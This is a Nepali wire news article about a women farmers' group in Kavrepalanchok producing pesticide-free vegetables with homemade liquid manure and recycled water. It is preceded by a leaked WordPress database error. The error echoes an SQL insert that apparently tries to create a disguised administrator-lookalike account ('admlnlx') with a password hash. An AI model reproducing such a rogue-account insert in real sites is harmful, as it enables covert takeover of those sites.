WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWa2qdGQwPuUpfJ/TBmaoA6nB3WpAC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:16:36', '', 'admlnlx', 'admlnlx')
बनेपा, पुस ७ –
काभ्रेपलाञ्चोकको पात्लेखेत गाविस–८ स्थित कल्छेबेसीमा कृषकले झोलमोलको प्रयोग गरी सुरक्षित खाद्य उत्पादन थालेका छन् ।
जलवायुमैत्री गाउँ परियोजना सञ्चालन भएपछि महिला कृषक समूहको संलग्नतामा सो उत्पादन सुरु भएको हो । यसअघि तरकारी खेतीमा रासायनिक मल र विषादीको प्रयोग अत्यधिक हुने गथ्र्यो । श्रमजिवी महिला कृषक समूहका अध्यक्ष विमला बजगाईं विषादीरहित तरकारी उत्पादन गर्न झोलमोलको प्रयोग गर्दै आएको बताउनुहुन्छ ।
भाँडा माझेको, गोडा धोएको र खेर गएको पानी सङ्कलन गरेर सिँचाइको व्यवस्था गरेको उहाँले बताउनुभयो । झारपात र जडीबुटी सङ्कलन गरेर झोलमोल बनाउने गरेको र यसलाई तीन चरणमा बाँडेर खेतीपातीमा प्रयोग गर्ने गरेको बजगाईंको भनाइ छ ।
“अरु ठाउँमा चैत, वैशाखमा सुख्खापनले हरियाली देख्न पाइँदैन तर यहाँ बाह्रैमास हरियाली देख्न पाइन्छ,” उहाँले भन्नुभयो । महिला कृषकले सो ठाउँमा दुई रोपनीदेखि सात रोपनी क्षेत्रफलमा तरकारी खेती गर्दैआएका छन् । काउली, बन्दागोभी, साग, लसुन, आलु, केराउलगायत उत्पादन गरी उनीहरुले मासिक रु एक लाखसम्म आम्दानी गर्ने गरेका छन् ।
जिल्ला कृषि विकास कार्यालयका वरिष्ठ कृषि विकास अधिकृत दुर्गा पण्डितले आगामी असार, साउनमा सो क्षेत्रमा बेमौसमी प्याजको उत्पादन सुरु गरी त्यसको परीक्षण समेत हुने बताउनुभयो । – रासस